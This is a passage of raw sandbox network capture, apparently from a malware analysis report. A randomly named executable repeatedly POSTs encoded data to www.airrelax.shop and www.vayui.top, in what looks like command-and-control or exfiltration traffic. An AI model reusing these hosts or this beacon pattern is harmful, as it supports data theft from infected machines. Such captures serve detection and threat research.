                                                                                                            Dec 12, 2024 10:23:28.043275118 CET127INData Raw: 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49
                                                                                                            Data Ascii: to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            43192.168.2.2249208172.67.215.235801020C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 10:23:29.529061079 CET808OUTPOST /gvzg/ HTTP/1.1
                                                                                                            Host: www.airrelax.shop
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.airrelax.shop
                                                                                                            Referer: http://www.airrelax.shop/gvzg/
                                                                                                            Content-Length: 199
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Data Raw: 78 34 3d 36 62 46 4c 79 69 68 6f 38 4a 59 69 79 63 34 78 67 53 52 55 64 41 4c 6d 46 6f 32 77 79 6f 79 47 76 64 6d 67 6b 4b 57 47 39 34 6d 63 54 36 50 6c 66 71 70 52 65 61 2b 4b 62 51 56 32 35 65 41 41 6e 68 35 49 67 4f 73 56 76 35 77 2f 50 69 78 51 78 62 2f 48 79 37 44 64 31 64 37 69 36 61 63 63 52 72 42 39 49 45 68 6a 32 46 48 64 56 6c 32 70 70 58 5a 61 70 7a 59 51 62 74 6c 42 66 57 69 46 6c 79 4e 31 4a 66 41 2b 32 39 38 4d 4d 4c 30 68 69 62 4d 6e 7a 37 50 7a 30 45 59 4c 5a 4a 34 6f 48 38 52 6b 2f 6a 6a 30 6a 52 38 6b 34 41 53 69 45 6a 52 53 6d 51 59 68 66 70 65 5a 4f 64 35 6d 58 77 3d 3d
                                                                                                            Data Ascii: x4=6bFLyiho8JYiyc4xgSRUdALmFo2wyoyGvdmgkKWG94mcT6PlfqpRea+KbQV25eAAnh5IgOsVv5w/PixQxb/Hy7Dd1d7i6accRrB9IEhj2FHdVl2ppXZapzYQbtlBfWiFlyN1JfA+298MML0hibMnz7Pz0EYLZJ4oH8Rk/jj0jR8k4ASiEjRSmQYhfpeZOd5mXw==
                                                                                                            Dec 12, 2024 10:23:30.781925917 CET1236INHTTP/1.1 405 Not Allowed
                                                                                                            Date: Thu, 12 Dec 2024 09:23:30 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l5QjRZ7m8kzoa8Ml%2Baag49c82MFt7qs3Uw2XUex%2FaolxKQolwE7E3Ul1sfaojxBDGuG%2B9YQ5jLuHXlrMYVnhHSWqElfDUdRqI4xp53AckYc1tgehugWz5SG9gjOFyZmAqGkVuA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f0ca7f34fcd42c6-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1576&min_rtt=1576&rtt_var=788&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=808&delivery_rate=0&cwnd=136&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                            Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE
                                                                                                            Dec 12, 2024 10:23:30.781943083 CET111INData Raw: 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69
                                                                                                            Data Ascii: and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            44192.168.2.2249209172.67.215.235801020C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 10:23:32.190774918 CET2472OUTPOST /gvzg/ HTTP/1.1
                                                                                                            Host: www.airrelax.shop
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.airrelax.shop
                                                                                                            Referer: http://www.airrelax.shop/gvzg/
                                                                                                            Content-Length: 3623
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Data Raw: 78 34 3d 36 62 46 4c 79 69 68 6f 38 4a 59 69 6a 49 45 78 69 7a 52 55 66 67 4c 68 4f 49 32 77 35 49 79 34 76 64 71 67 6b 49 36 73 39 71 4b 63 64 4a 48 6c 65 4a 42 52 63 61 2b 4b 5a 51 56 79 68 2b 41 57 6e 68 39 75 67 4d 30 46 76 2f 6f 2f 50 45 70 51 33 5a 58 47 39 72 44 66 78 64 37 6c 36 61 63 56 52 71 74 35 49 45 30 30 32 46 66 64 56 57 65 70 39 33 5a 5a 73 7a 59 51 62 74 6b 56 66 57 69 70 6c 79 56 74 4a 65 59 75 32 76 6b 4d 4d 71 55 68 6c 34 6b 6b 78 37 50 33 71 55 5a 41 51 37 46 58 4f 63 5a 57 32 69 58 72 72 79 6b 2f 34 52 6e 75 63 6a 56 76 73 77 4d 7a 65 5a 71 4e 41 65 34 76 41 73 69 79 74 47 72 4c 59 71 58 53 55 6d 50 53 5a 49 37 47 68 39 71 73 7a 58 63 75 6a 69 46 58 48 74 39 6d 67 30 54 44 33 6b 7a 76 51 4e 61 69 75 30 2f 4c 33 6e 52 39 59 50 75 59 44 55 4d 2b 2f 73 36 74 74 6c 4c 44 6a 4d 41 45 6b 79 55 2b 78 67 59 74 68 4e 54 6d 70 39 39 5a 36 49 48 73 61 39 37 7a 44 35 4c 62 6d 67 37 36 57 2f 35 58 35 69 6b 47 78 6b 61 67 63 6b 68 73 68 32 48 4d 4d 35 78 62 49 54 6b 59 69 45 6c 64 6f 68 34 [TRUNCATED]
                                                                                                            Data Ascii: x4=6bFLyiho8JYijIExizRUfgLhOI2w5Iy4vdqgkI6s9qKcdJHleJBRca+KZQVyh+AWnh9ugM0Fv/o/PEpQ3ZXG9rDfxd7l6acVRqt5IE002FfdVWep93ZZszYQbtkVfWiplyVtJeYu2vkMMqUhl4kkx7P3qUZAQ7FXOcZW2iXrryk/4RnucjVvswMzeZqNAe4vAsiytGrLYqXSUmPSZI7Gh9qszXcujiFXHt9mg0TD3kzvQNaiu0/L3nR9YPuYDUM+/s6ttlLDjMAEkyU+xgYthNTmp99Z6IHsa97zD5Lbmg76W/5X5ikGxkagckhsh2HMM5xbITkYiEldoh49WCyQwb34Opxa/BTsngJZ2NfEexQB2yBi8rPKsyWro+Gseb5mjBktsysjOWkflKEFCmFDiWUkts38mUHl9sUMTEBl73WBve+20uPq5ULsL/m1iIkBDfYftitfEPR5NTycB6RcKoPpP6XF0UYr1L8D+O+Wn1TQR+HjD6bM+mNskQ8Rr/bd3Lu1Bjg/bQfmGqMp5CJiGZdhmXIm5PJr+GOOgHm27xygd/pxsnro0RaoWG+/44gz9zQw2XZbefEtWzAdRVjgTL9DMBiJ+vsW573GtWc2mO1bGmCoSJPUW4BhfUEFiXGKCMOrppRRInj3VzXZK2xP7wu04fy1jfsDagOEOFa9PVkngvGIRypWDAeOM7ftLNc4zdx3jBX5sTII+9Ui6M43+xZg795k2218CZe8xrZaes1MtzeMSt8Myd7JfMnR5kuy2nHi9YiFVjwbWoVE90BKd9YkFUvbtpKyzUq1i7wSXaJcKL9uAKlJo3zBJGnC+hYaFvjBHPTHUPK/Oip2EiWZT+rEkrms67iptepSLEZuzHLXuZIeUkH3z9ALVE3g+pKMlpmwR9FzC7re0jm7g3FOsclEXarDEFeXWIfsqk/x6u5OMVQHAOCRyqIZzz0zgv75Ze//G6sE4DuL8smZ7uHc7HMbFBbfscQxF5vUGZcILaV4VoEqF [TRUNCATED]
                                                                                                            Dec 12, 2024 10:23:32.310126066 CET1761OUTData Raw: 77 35 36 62 71 6f 45 76 68 54 55 49 50 53 4a 54 65 6c 4d 70 7a 52 35 77 64 50 4a 46 69 62 75 78 55 6c 54 58 66 6d 42 66 43 50 38 74 58 30 74 71 39 36 59 68 6c 41 73 64 65 4e 33 4d 35 51 4b 32 6b 2b 6b 34 47 74 54 46 76 6e 47 66 70 2b 61 6d 67 41
                                                                                                            Data Ascii: w56bqoEvhTUIPSJTelMpzR5wdPJFibuxUlTXfmBfCP8tX0tq96YhlAsdeN3M5QK2k+k4GtTFvnGfp+amgA4Zlzrafi/s0dHvkDE2LDYxO0ilExYrj8cEUGbKPSsIqwMEDchNTo0CMrqK/ogEkrLg/6qC/fN+EMAmZ/2825buFkkLxDSXtEPjFkqBp0Oh9qTA09MkTCOJh0AIhNXMPezQlv3NApNegmMRdME2681s9FV6fM8sTuk
                                                                                                            Dec 12, 2024 10:23:33.441935062 CET1236INHTTP/1.1 405 Not Allowed
                                                                                                            Date: Thu, 12 Dec 2024 09:23:33 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9X31UpTv4L3iN%2F%2F2nm61j2iGLxv6RFVHKnPBrG4gwWbUREEEKkXn31ZvOW%2Bek17vtOOsFmZ45i5KbfJIRxDW1doBQPwrKjhy9qd10P78YTB7HnLwQFR2BlMXFSFImoJWUs2gSw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f0ca803f9915e7c-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2071&min_rtt=2071&rtt_var=1035&sent=3&recv=6&lost=0&retrans=0&sent_bytes=0&recv_bytes=4233&delivery_rate=0&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                            Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MS
                                                                                                            Dec 12, 2024 10:23:33.441951036 CET113INData Raw: 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66
                                                                                                            Data Ascii: IE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            45192.168.2.2249210172.67.215.235801020C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 10:23:34.840564966 CET542OUTGET /gvzg/?x4=3ZtrxXVK8OpQj/IeinJ3ZiXeAcGxlO+Pqtakmq6NsaDAWPHTfqsTTp3MR0RJjMVggAZP9MES5OMDJz4L+ZnM27rh6ujY7a8DVehBMFx021rrXiLY5F9HpwIHbLcF&e2E=wRQ8oHXx HTTP/1.1
                                                                                                            Host: www.airrelax.shop
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Dec 12, 2024 10:23:36.102161884 CET1236INHTTP/1.1 200 OK
                                                                                                            Date: Thu, 12 Dec 2024 09:23:35 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Last-Modified: Fri, 25 Oct 2024 07:07:09 GMT
                                                                                                            Vary: Accept-Encoding
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XacOeoS9crCYvQMx1vShV7cR1OOS7bOjNPgLJdr1H5SHjftbGtocKYshBKHvH9%2FwOuZ46sDhTbymNZ%2BRSkS3PUHrBDG1%2BLR1mKUD%2BhpKFYFuh3buecxJ2EihLqlAUqRogwScmQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f0ca8148ca543d0-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1569&min_rtt=1569&rtt_var=784&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=542&delivery_rate=0&cwnd=171&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            Data Raw: 35 36 62 38 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 0a 09 09 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 2c 76 69 65 77 70 6f 72 74 2d 66 69 74 3d 63 6f 76 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0a 09 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 79 65 73 22 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 63 61 70 61 [TRUNCATED]
                                                                                                            Data Ascii: 56b8<html lang=""><head><meta charset="utf-8"><meta name="viewport"content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,user-scalable=no,viewport-fit=cove" /><meta http-equiv="X-UA-Compatible" content="IE=edge"><link rel="icon" href="favicon.ico"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="yes" name="apple-touch-fullscreen"><
                                                                                                            Dec 12, 2024 10:23:36.102205992 CET1236INData Raw: 74 69 74 6c 65 3e 61 63 74 69 6f 6e 61 72 65 6e 61 2e 74 6f 70 3a 20 57 68 65 72 65 20 68 61 70 70 69 6e 65 73 73 20 6d 65 65 74 73 20 69 6e 6e 6f 76 61 74 69 6f 6e 20 7c 20 4f 6e 6c 69 6e 65 20 47 61 6d 65 20 7c 20 46 72 65 65 20 47 61 6d 65 3c
                                                                                                            Data Ascii: title>actionarena.top: Where happiness meets innovation | Online Game | Free Game</title><link href="css/chunk-common.2627b58b.css" rel="preload" as="style"><link href="css/chunk-vendors.df919975.css" rel="preload" as="style"><link href=
                                                                                                            Dec 12, 2024 10:23:36.102217913 CET1236INData Raw: 73 28 29 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 67 6f 6f 67 6c 65 74 61 67 2e 70 75 62 61 64 73 28 29 2e 65 6e 61 62 6c 65 53 69 6e 67 6c 65 52 65 71 75 65 73 74 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 67 6f 6f 67 6c 65 74 61 67 2e
                                                                                                            Data Ascii: s()); googletag.pubads().enableSingleRequest(); googletag.enableServices(); }); </script> adEnd--><script>window.aiptag = window.aiptag || {cmd: []};aiptag.cmd.display = aiptag.cmd.display || [];
                                                                                                            Dec 12, 2024 10:23:36.102341890 CET1236INData Raw: 65 74 63 2e 0a 09 09 09 69 66 20 28 74 79 70 65 6f 66 20 61 69 70 74 61 67 2e 61 64 70 6c 61 79 65 72 20 21 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 29 20 7b 0a 09 09 09 09 61 69 70 74 61 67 2e 63 6d 64 2e 70 6c 61 79 65 72 2e 70 75 73 68 28 66
                                                                                                            Data Ascii: etc.if (typeof aiptag.adplayer !== 'undefined') {aiptag.cmd.player.push(function() { aiptag.adplayer.startVideoAd(); });} else {//Adlib didnt load this could be due to an adblocker, timeout etc.//Please add your script h
                                                                                                            Dec 12, 2024 10:23:36.102365017 CET1236INData Raw: 65 22 3e 0a 09 09 09 09 09 09 48 6f 6d 65 0a 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 61 3e 0a 09 09 09 3c 61 20 64 61 74 61 2d 76 2d 34 39 37 35 39 38 31 39 3d 22 22 20 68 72 65 66 3d 22 73 65 61 72
                                                                                                            Data Ascii: e">Home</span></div></a><a data-v-49759819="" href="search.html?type=Popular" class="type_item" style="display: none;"></a><a data-v-49759819="" href="search.html?type=Girls" class="type_item"><div data-v
                                                                                                            Dec 12, 2024 10:23:36.102404118 CET1236INData Raw: 74 6d 6c 3f 74 79 70 65 3d 52 61 63 69 6e 67 22 20 63 6c 61 73 73 3d 22 74 79 70 65 5f 69 74 65 6d 22 3e 0a 09 09 09 09 3c 64 69 76 20 64 61 74 61 2d 76 2d 34 39 37 35 39 38 31 39 3d 22 22 3e 0a 09 09 09 09 09 3c 69 6d 67 20 64 61 74 61 2d 76 2d
                                                                                                            Data Ascii: tml?type=Racing" class="type_item"><div data-v-49759819=""><img data-v-49759819="" alt="" src="img/racing.1bfb9b83.png" data-src="img/racing.1bfb9b83.png"style="width: 1.5rem; height: 1.5rem;"><span data-v-49759819="" c
                                                                                                            Dec 12, 2024 10:23:36.102421045 CET1236INData Raw: 20 31 2e 35 72 65 6d 3b 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 76 2d 34 39 37 35 39 38 31 39 3d 22 22 20 63 6c 61 73 73 3d 22 69 74 65 6d 5f 6e 61 6d 65 22 3e 0a 09 09 09 09 09 09 53 70 6f 72 74 73 0a 09 09 09 09 09 3c 2f 73 70
                                                                                                            Data Ascii: 1.5rem;"><span data-v-49759819="" class="item_name">Sports</span></div></a><a data-v-49759819="" href="search.html?type=Action" class="type_item"><div data-v-49759819=""><img data-v-49759819="" alt="
                                                                                                            Dec 12, 2024 10:23:36.102580070 CET1236INData Raw: 65 61 64 65 72 22 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 09 3c 64 69 76 20 64 61 74 61 2d 76 2d 34 39 37 35 39 38 31 39 3d 22 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 22 3e 0a 09 09 09 09 09 3c 73 76 67 20 64 61 74 61 2d 76 2d
                                                                                                            Data Ascii: eader" class="header"><div data-v-49759819="" class="menu"><svg data-v-49759819="" t="1687244222935" viewBox="0 0 1024 1024" version="1.1"xmlns="http://www.w3.org/2000/svg" p-id="19883" xmlns:xlink="http://www.w3.org/1999/xli
                                                                                                            Dec 12, 2024 10:23:36.102591038 CET1236INData Raw: 3e 0a 09 09 09 09 3c 61 20 64 61 74 61 2d 76 2d 34 39 37 35 39 38 31 39 3d 22 22 20 68 72 65 66 3d 22 73 65 61 72 63 68 2e 68 74 6d 6c 3f 71 3d 22 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 22 3e 0a 09 09 09 09 09 3c 73 76 67 20 64 61 74 61 2d 76
                                                                                                            Data Ascii: ><a data-v-49759819="" href="search.html?q=" class="search"><svg data-v-49759819="" t="1687244550911" viewBox="0 0 1024 1024" version="1.1"xmlns="http://www.w3.org/2000/svg" p-id="3078" data-spm-anchor-id="a313x.7781069.0.i2"
                                                                                                            Dec 12, 2024 10:23:36.102597952 CET1236INData Raw: 09 3c 69 6e 70 75 74 20 64 61 74 61 2d 76 2d 30 35 34 34 37 39 33 66 3d 22 22 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 69 6e 70 75 74 20 74 68 65 20 6b 65 79 77 6f 72 64 73 22 20 63 6c 65 61 72 61 62 6c 65 3d
                                                                                                            Data Ascii: <input data-v-0544793f="" type="text" placeholder="input the keywords" clearable="" defaultvalue=""><div data-v-0544793f=""><svg data-v-0544793f="" t="1680079992751" viewBox="0 0 1024 1024" version="1.1"xmlns="http://www.w3.
                                                                                                            Dec 12, 2024 10:23:36.221756935 CET1236INData Raw: 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 64 45 6e 64 2d 2d 3e 0a 09 09 09 09 09 3c 64 69 76 20 69 64 3d 27 61 63 74 69 6f 6e 61 72 65 6e 61 2d 74 6f 70 5f 33 30 30 78 32 35 30 27 3e 0a 09 09 09 09 09 3c 73 63
                                                                                                            Data Ascii: div> adEnd--><div id='actionarena-top_300x250'><script type='text/javascript'>aiptag.cmd.display.push(function() { aipDisplayTag.display('actionarena-top_300x250'); });</script></div>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            46192.168.2.2249211172.67.145.234801020C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 10:23:42.382726908 CET2472OUTPOST /ge5i/ HTTP/1.1
                                                                                                            Host: www.vayui.top
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.vayui.top
                                                                                                            Referer: http://www.vayui.top/ge5i/
                                                                                                            Content-Length: 2159
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
